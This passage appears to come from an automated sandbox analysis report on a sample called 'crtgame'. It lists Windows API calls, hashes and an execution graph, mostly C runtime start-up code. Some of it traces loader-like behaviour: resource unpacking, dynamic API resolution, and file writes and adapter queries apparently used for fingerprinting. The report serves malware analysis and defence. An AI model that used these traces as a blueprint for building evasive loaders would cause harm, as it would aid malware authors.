                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandleModuleNameWrite
                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                              • API String ID: 3784150691-4022980321
                                                                              • Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                              • Instruction ID: 66213c8598c100419aca2a23d32cbd7848d5265dc6afe1337dc7fe815477c880
                                                                              • Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                              • Instruction Fuzzy Hash: 4B31A7B2600218BEEF20EA60DD49FDA376CEF85304F1005BBF545F61D1D6B8AD548A5D
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040477B
                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040478F
                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 004047BB
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 004047F3
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 00404815
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FF6), ref: 0040482E
                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 00404841
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040487F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1823725401-0
                                                                              • Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                              • Instruction ID: d94799acc24e98fca2fbef921ce91b810f6c8713fa78e77f5a065486d65e4eae
                                                                              • Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                              • Instruction Fuzzy Hash: CA31F2F75042A55ED7207BB59C8483B76DCE6C5358711893FFA42F3280E6398C4186A9
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00000000,0000000A,00000000), ref: 00402011
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040201D
                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040202A
                                                                              • LoadResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402044
                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040204B
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402056
                                                                              • GetTickCount.KERNEL32 ref: 00402092
                                                                              • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,004023A6,00000190,00409F34), ref: 004020F8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                              • String ID:
                                                                              • API String ID: 564119183-0
                                                                              • Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                              • Instruction ID: ecab55d02aed30cb2302f8ec7062e98c1eb40003726056bc5c009be87fd8cf01
                                                                              • Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                              • Instruction Fuzzy Hash: 1C313C71A003456FDF118BB99E88AAF7F78EF49344B10803AFA46F72C1D6748940C768
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,74DF30D0,00000000,?,0040238C,00000000,?,00000000), ref: 004021E3
                                                                              • GetLastError.KERNEL32(?,?,?,?,0040238C,00000000), ref: 00402298
                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,?,?,?,?,0040238C,00000000), ref: 004022A5
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004022E0
                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,0040238C,00000000), ref: 00402336
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
                                                                              • String ID: (
                                                                              • API String ID: 2871813557-3887548279
                                                                              • Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                              • Instruction ID: fa8a78d08e5b147245ce613c51b7eec45b3ed4bb95c194ee9eab5a02c05580c9
                                                                              • Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                              • Instruction Fuzzy Hash: DE516375A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B5EA51CB94
                                                                              APIs
                                                                              • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032F0), ref: 00403B79
                                                                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032F0), ref: 00403B9D
                                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032F0), ref: 00403BB7
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032F0), ref: 00403C78
                                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032F0), ref: 00403C8F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual$FreeHeap
                                                                              • String ID: @q@$@q@
                                                                              • API String ID: 714016831-1591251108
                                                                              • Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                              • Instruction ID: 6b7d5d1079877a4fdc04a989ad5d4427692f66b21ec07018b92eff91f37320a0
                                                                              • Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                              • Instruction Fuzzy Hash: 47311071A447019BE3308F28DD49B22BBA8E74475AF00423BE155FB3D1E778B9008B0D
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32 ref: 00403181
                                                                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031B6
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403216
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentFileModuleNameVariableVersion
                                                                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                              • API String ID: 1385375860-4131005785
                                                                              • Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                              • Instruction ID: 0bfe33c8882bc5da799f901860b26a8a70e2baa25249e611fba62494fac00854
                                                                              • Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                              • Instruction Fuzzy Hash: FA3124719052846EEB319A705C55BDA3F6C9B0730AF2404FFD085F92C2E63D8F8A8B19
                                                                              APIs
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 004048EB
                                                                              • GetFileType.KERNEL32(00000800), ref: 00404991
                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 004049EA
                                                                              • GetFileType.KERNEL32(00000000), ref: 004049F8
                                                                              • SetHandleCount.KERNEL32 ref: 00404A2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleType$CountInfoStartup
                                                                              • String ID:
                                                                              • API String ID: 1710529072-0
                                                                              • Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                              • Instruction ID: 4e5b6c2e9b57b0b0783508239f10a0ad73356ae994103a46a91c1c9ef3db655a
                                                                              • Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                              • Instruction Fuzzy Hash: EF5124F16043608BD7208B38CD447673BA0BB81324F1A473AE6E6FB2E1D73C8855875A
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                              • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,N@ ,?,00000000,00000000,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide
                                                                              • String ID: N@
                                                                              • API String ID: 352835431-2588724849
                                                                              • Opcode ID: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                              • Instruction ID: 20da4dc5c4367d057857615b5720e39787682ab55b18fc8d36651601e05c1bdf
                                                                              • Opcode Fuzzy Hash: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                              • Instruction Fuzzy Hash: 1C11D432900609ABDF228F94CD44ADFBBB6EB48750F148166FE16721A0D3368D61DF64
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403D9C,@q@,74DEDFF0,?,00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CAB
                                                                              • HeapFree.KERNEL32(00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Free$HeapVirtual
                                                                              • String ID: @q@$@q@
                                                                              • API String ID: 3783212868-1591251108
                                                                              • Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                              • Instruction ID: f6895fdbbb123314fbd550313b942ac7b83e67952c1407439619f49545067eb6
                                                                              • Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                              • Instruction Fuzzy Hash: 88F03431A04210DFD3249F28EE09A427BF4FB08710B014A2AE4A6AB3E1C731AC40CF48
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,00000000), ref: 0040571A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID: $
                                                                              • API String ID: 1807457897-3032137957
                                                                              • Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                              • Instruction ID: f7edae9c6ae74023553f5d2ec798d7d3c7047796f49532e24c337197b6512109
                                                                              • Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                              • Instruction Fuzzy Hash: 494154320007A85EEB15A724DD49BFB3FA9DB06704F1400F6D946FB192C27949289FAF
                                                                              APIs
                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 004039D4
                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A08
                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A22
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A39
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: AllocHeap$FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 3499195154-0
                                                                              • Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                              • Instruction ID: 429f96408e1d6026f999a6daa987e4c74961ce2be0a7022420d0a9926faab586
                                                                              • Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                              • Instruction Fuzzy Hash: E4116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E71B0D7729961CF09

                                                                              Execution Graph

                                                                              Execution Coverage:10.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0.6%
                                                                              Total number of Nodes:351
                                                                              Total number of Limit Nodes:22
                                                                              execution_graph 14902 2c25f14 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 14981 2c2f1e7 14902->14981 14904 2c25f94 GetTickCount 14990 2c25c39 14904->14990 15168 2c2f29c CreateFileA 14981->15168 14986 2c2f28b 14986->14904 14987 2c2f23f CreateFileA 14987->14986 14988 2c2f263 GetFileTime CloseHandle 14987->14988 14988->14986 14989 2c2f27d 14988->14989 14989->14986 14991 2c329ac _malloc 59 API calls 14990->14991 14992 2c25c4d __crtGetStringTypeA_stat 14991->14992 14993 2c25c60 SHGetSpecialFolderPathW lstrcpyW lstrcatW CreateFileW 14992->14993 14994 2c25cbe 14993->14994 14995 2c25c9f ReadFile CloseHandle 14993->14995 15183 2c334fb GetSystemTimeAsFileTime 14994->15183 14996 2c25d04 14995->14996 15185 2c255a8 14996->15185 14998 2c25cca CreateFileW 14998->14996 15000 2c25ceb WriteFile CloseHandle 14998->15000 15000->14996 15169 2c2f221 15168->15169 15171 2c2f2cd 15168->15171 15175 2c2f3a0 LoadLibraryA 15169->15175 15170 2c2f2e5 DeviceIoControl 15170->15171 15171->15170 15172 2c2f38e CloseHandle 15171->15172 15173 2c2f35a GetLastError 15171->15173 15174 2c3354c _Allocate 60 API calls 15171->15174 15172->15169 15173->15171 15173->15172 15174->15171 15176 2c2f229 GetWindowsDirectoryA 15175->15176 15177 2c2f3c9 GetProcAddress 15175->15177 15176->14986 15176->14987 15178 2c2f47c FreeLibrary 15177->15178 15181 2c2f3dd 15177->15181 15178->15176 15179 2c2f3ef GetAdaptersInfo 15179->15181 15180 2c2f477 15180->15178 15181->15179 15181->15180 15182 2c3354c _Allocate 60 API calls 15181->15182 15182->15181 15184 2c33529 __aulldiv 15183->15184 15184->14998 15186 2c329ac _malloc 59 API calls 15185->15186 15187 2c255c4 15186->15187 17224 2c5e90c WriteFile 17225 2cb5bdd 17224->17225 17226 2c3370f 17227 2c33718 17226->17227 17228 2c3371d 17226->17228 17240 2c3b2e4 17227->17240 17232 2c33732 17228->17232 17231 2c3372b 17233 2c3373e __close 17232->17233 17237 2c3378c ___DllMainCRTStartup 17233->17237 17239 2c337e9 __close 17233->17239 17244 2c3359d 17233->17244 17235 2c337c6 17236 2c3359d __CRT_INIT@12 138 API calls 17235->17236 17235->17239 17236->17239 17237->17235 17238 2c3359d __CRT_INIT@12 138 API calls 17237->17238 17237->17239 17238->17235 17239->17231 17241 2c3b307 17240->17241 17242 2c3b314 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17240->17242 17241->17242 17243 2c3b30b 17241->17243 17242->17243 17243->17228 17245 2c335a9 __close 17244->17245 17246 2c335b1 17245->17246 17247 2c3362b 17245->17247 17292 2c37be6 GetProcessHeap 17246->17292 17249 2c33694 17247->17249 17250 2c3362f 17247->17250 17252 2c336f7 17249->17252 17253 2c33699 17249->17253 17255 2c33650 17250->17255 17285 2c335ba __close __CRT_INIT@12 17250->17285 17393 2c37e5b 17250->17393 17251 2c335b6 17251->17285 17293 2c35794 17251->17293 17257 2c35624 __freeptd 59 API calls 17252->17257 17252->17285 17254 2c38bcb __CRT_INIT@12 TlsGetValue 17253->17254 17259 2c336a4 17254->17259 17396 2c37d32 RtlDecodePointer 17255->17396 17257->17285 17263 2c3846e __calloc_crt 59 API calls 17259->17263 17259->17285 17262 2c335c6 __RTC_Initialize 17269 2c335d6 GetCommandLineA 17262->17269 17262->17285 17265 2c336b5 17263->17265 17264 2c33666 __CRT_INIT@12 17420 2c3367f 17264->17420 17270 2c38bea __CRT_INIT@12 TlsSetValue 17265->17270 17265->17285 17266 2c3af7f __ioterm 60 API calls 17268 2c33661 17266->17268 17271 2c3580a __mtterm 62 API calls 17268->17271 17314 2c3b380 GetEnvironmentStringsW 17269->17314 17273 2c336cd 17270->17273 17271->17264 17275 2c336d3 17273->17275 17276 2c336eb 17273->17276 17278 2c356e1 __initptd 59 API calls 17275->17278 17279 2c32974 ___endstdio 59 API calls 17276->17279 17281 2c336db GetCurrentThreadId 17278->17281 17279->17285 17280 2c335f0 17282 2c335f4 17280->17282 17346 2c3afd4 17280->17346 17281->17285 17379 2c3580a 17282->17379 17285->17237 17287 2c33614 17287->17285 17388 2c3af7f 17287->17388 17292->17251 17424 2c37f02 RtlEncodePointer 17293->17424 17295 2c35799 17429 2c38420 17295->17429 17298 2c357a2 17299 2c3580a __mtterm 62 API calls 17298->17299 17301 2c357a7 17299->17301 17301->17262 17303 2c357bf 17304 2c3846e __calloc_crt 59 API calls 17303->17304 17305 2c357cc 17304->17305 17306 2c35801 17305->17306 17307 2c38bea __CRT_INIT@12 TlsSetValue 17305->17307 17308 2c3580a __mtterm 62 API calls 17306->17308 17309 2c357e0 17307->17309 17310 2c35806 17308->17310 17309->17306 17311 2c357e6 17309->17311 17310->17262 17312 2c356e1 __initptd 59 API calls 17311->17312 17313 2c357ee GetCurrentThreadId 17312->17313 17313->17262 17315 2c3b393 WideCharToMultiByte 17314->17315 17319 2c335e6 17314->17319 17317 2c3b3c6 17315->17317 17318 2c3b3fd FreeEnvironmentStringsW 17315->17318 17320 2c384b6 __malloc_crt 59 API calls 17317->17320 17318->17319 17327 2c3accb 17319->17327 17321 2c3b3cc 17320->17321 17321->17318 17322 2c3b3d3 WideCharToMultiByte 17321->17322 17323 2c3b3f2 FreeEnvironmentStringsW 17322->17323 17324 2c3b3e9 17322->17324 17323->17319 17325 2c32974 ___endstdio 59 API calls 17324->17325 17326 2c3b3ef 17325->17326 17326->17323 17328 2c3acd7 __close 17327->17328 17329 2c382ef __lock 59 API calls 17328->17329 17330 2c3acde 17329->17330 17331 2c3846e __calloc_crt 59 API calls 17330->17331 17334 2c3acef 17331->17334 17332 2c3acfa __close @_EH4_CallFilterFunc@8 17332->17280 17333 2c3ad5a GetStartupInfoW 17340 2c3ad6f 17333->17340 17341 2c3ae9e 17333->17341 17334->17332 17334->17333 17335 2c3af66 17437 2c3af76 17335->17437 17337 2c3846e __calloc_crt 59 API calls 17337->17340 17338 2c3aeeb GetStdHandle 17338->17341 17339 2c3aefe GetFileType 17339->17341 17340->17337 17340->17341 17343 2c3adbd 17340->17343 17341->17335 17341->17338 17341->17339 17345 2c38c0c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 17341->17345 17342 2c3adf1 GetFileType 17342->17343 17343->17341 17343->17342 17344 2c38c0c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 17343->17344 17344->17343 17345->17341 17347 2c3afe2 17346->17347 17348 2c3afe7 GetModuleFileNameA 17346->17348 17447 2c34c8a 17347->17447 17350 2c3b014 17348->17350 17441 2c3b087 17350->17441 17352 2c33600 17352->17287 17357 2c3b203 17352->17357 17354 2c384b6 __malloc_crt 59 API calls 17355 2c3b04d 17354->17355 17355->17352 17356 2c3b087 _parse_cmdline 59 API calls 17355->17356 17356->17352 17358 2c3b20c 17357->17358 17361 2c3b211 __fptostr 17357->17361 17359 2c34c8a ___initmbctable 71 API calls 17358->17359 17359->17361 17360 2c3846e __calloc_crt 59 API calls 17366 2c3b247 __fptostr 17360->17366 17361->17360 17364 2c33609 17361->17364 17362 2c3b299 17363 2c32974 ___endstdio 59 API calls 17362->17363 17363->17364 17364->17287 17373 2c37e6a 17364->17373 17365 2c3846e __calloc_crt 59 API calls 17365->17366 17366->17362 17366->17364 17366->17365 17367 2c3b2c0 17366->17367 17370 2c3b2d7 17366->17370 17569 2c366bc 17366->17569 17368 2c32974 ___endstdio 59 API calls 17367->17368 17368->17364 17371 2c34905 __invoke_watson 8 API calls 17370->17371 17372 2c3b2e3 17371->17372 17374 2c37e76 __IsNonwritableInCurrentImage 17373->17374 17578 2c3ccdf 17374->17578 17376 2c37e94 __initterm_e 17377 2c32da4 __cinit 68 API calls 17376->17377 17378 2c37eb3 _doexit __IsNonwritableInCurrentImage 17376->17378 17377->17378 17378->17287 17380 2c35814 17379->17380 17382 2c3581a 17379->17382 17581 2c38bac 17380->17581 17383 2c38339 RtlDeleteCriticalSection 17382->17383 17384 2c38355 17382->17384 17385 2c32974 ___endstdio 59 API calls 17383->17385 17386 2c38361 RtlDeleteCriticalSection 17384->17386 17387 2c38374 17384->17387 17385->17382 17386->17384 17387->17285 17390 2c3af86 17388->17390 17389 2c3afce 17389->17282 17390->17389 17391 2c32974 ___endstdio 59 API calls 17390->17391 17392 2c3af9f RtlDeleteCriticalSection 17390->17392 17391->17390 17392->17390 17394 2c37fa6 _doexit 59 API calls 17393->17394 17395 2c37e66 17394->17395 17395->17255 17397 2c37d5e 17396->17397 17398 2c37d4c 17396->17398 17399 2c32974 ___endstdio 59 API calls 17397->17399 17398->17397 17400 2c32974 ___endstdio 59 API calls 17398->17400 17402 2c37d6b 17399->17402 17400->17398 17401 2c32974 ___endstdio 59 API calls 17404 2c37d9b 17401->17404 17403 2c37d8f 17402->17403 17405 2c32974 ___endstdio 59 API calls 17402->17405 17403->17401 17406 2c32974 ___endstdio 59 API calls 17404->17406 17405->17402 17407 2c37dac 17406->17407 17408 2c32974 ___endstdio 59 API calls 17407->17408 17409 2c37db7 17408->17409 17410 2c37ddc RtlEncodePointer 17409->17410 17414 2c32974 ___endstdio 59 API calls 17409->17414 17411 2c37df1 17410->17411 17412 2c37df7 17410->17412 17415 2c32974 ___endstdio 59 API calls 17411->17415 17413 2c37e0d 17412->17413 17416 2c32974 ___endstdio 59 API calls 17412->17416 17417 2c33655 17413->17417 17419 2c32974 ___endstdio 59 API calls 17413->17419 17418 2c37ddb 17414->17418 17415->17412 17416->17413 17417->17264 17417->17266 17418->17410 17419->17417 17421 2c33683 17420->17421 17422 2c33691 17420->17422 17421->17422 17423 2c3580a __mtterm 62 API calls 17421->17423 17422->17285 17423->17422 17425 2c37f13 __init_pointers __initp_misc_winsig 17424->17425 17436 2c33407 RtlEncodePointer 17425->17436 17427 2c37f2b __init_pointers 17428 2c38c7a 34 API calls 17427->17428 17428->17295 17430 2c3842c 17429->17430 17431 2c3579e 17430->17431 17432 2c38c0c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 17430->17432 17431->17298 17433 2c38b8e 17431->17433 17432->17430 17434 2c38ba5 TlsAlloc 17433->17434 17435 2c357b4 17433->17435 17435->17298 17435->17303 17436->17427 17440 2c38459 RtlLeaveCriticalSection 17437->17440 17439 2c3af7d 17439->17332 17440->17439 17443 2c3b0a9 17441->17443 17446 2c3b10d 17443->17446 17451 2c40fd6 17443->17451 17444 2c3b02a 17444->17352 17444->17354 17445 2c40fd6 _parse_cmdline 59 API calls 17445->17446 17446->17444 17446->17445 17448 2c34c93 17447->17448 17449 2c34c9a 17447->17449 17457 2c34fe7 17448->17457 17449->17348 17454 2c40f7c 17451->17454 17455 2c31c7b _LocaleUpdate::_LocaleUpdate 59 API calls 17454->17455 17456 2c40f8e 17455->17456 17456->17443 17458 2c34ff3 __close 17457->17458 17459 2c3565a _LocaleUpdate::_LocaleUpdate 59 API calls 17458->17459 17460 2c34ffb 17459->17460 17461 2c34f41 _LocaleUpdate::_LocaleUpdate 59 API calls 17460->17461 17462 2c35005 17461->17462 17482 2c34ce2 17462->17482 17465 2c384b6 __malloc_crt 59 API calls 17467 2c35027 17465->17467 17466 2c35154 __close 17466->17449 17467->17466 17489 2c3518f 17467->17489 17470 2c35164 17470->17466 17473 2c35177 17470->17473 17474 2c32974 ___endstdio 59 API calls 17470->17474 17471 2c3505d 17472 2c3507d 17471->17472 17476 2c32974 ___endstdio 59 API calls 17471->17476 17472->17466 17477 2c382ef __lock 59 API calls 17472->17477 17475 2c3585b __close 59 API calls 17473->17475 17474->17473 17475->17466 17476->17472 17479 2c350ac 17477->17479 17478 2c3513a 17499 2c35159 17478->17499 17479->17478 17481 2c32974 ___endstdio 59 API calls 17479->17481 17481->17478 17483 2c31c7b _LocaleUpdate::_LocaleUpdate 59 API calls 17482->17483 17484 2c34cf2 17483->17484 17485 2c34d13 17484->17485 17486 2c34d01 GetOEMCP 17484->17486 17487 2c34d2a 17485->17487 17488 2c34d18 GetACP 17485->17488 17486->17487 17487->17465 17487->17466 17488->17487 17490 2c34ce2 getSystemCP 61 API calls 17489->17490 17491 2c351ac 17490->17491 17492 2c351b3 setSBCS 17491->17492 17495 2c351fd IsValidCodePage 17491->17495 17497 2c35222 __crtGetStringTypeA_stat __setmbcp_nolock 17491->17497 17493 2c33f4b __crtGetStringTypeA_stat 6 API calls 17492->17493 17494 2c3504e 17493->17494 17494->17470 17494->17471 17495->17492 17496 2c3520f GetCPInfo 17495->17496 17496->17492 17496->17497 17502 2c34daf GetCPInfo 17497->17502 17568 2c38459 RtlLeaveCriticalSection 17499->17568 17501 2c35160 17501->17466 17508 2c34de7 17502->17508 17511 2c34e91 17502->17511 17505 2c33f4b __crtGetStringTypeA_stat 6 API calls 17507 2c34f3d 17505->17507 17507->17492 17512 2c3d61d 17508->17512 17510 2c3d4c1 ___crtLCMapStringA 63 API calls 17510->17511 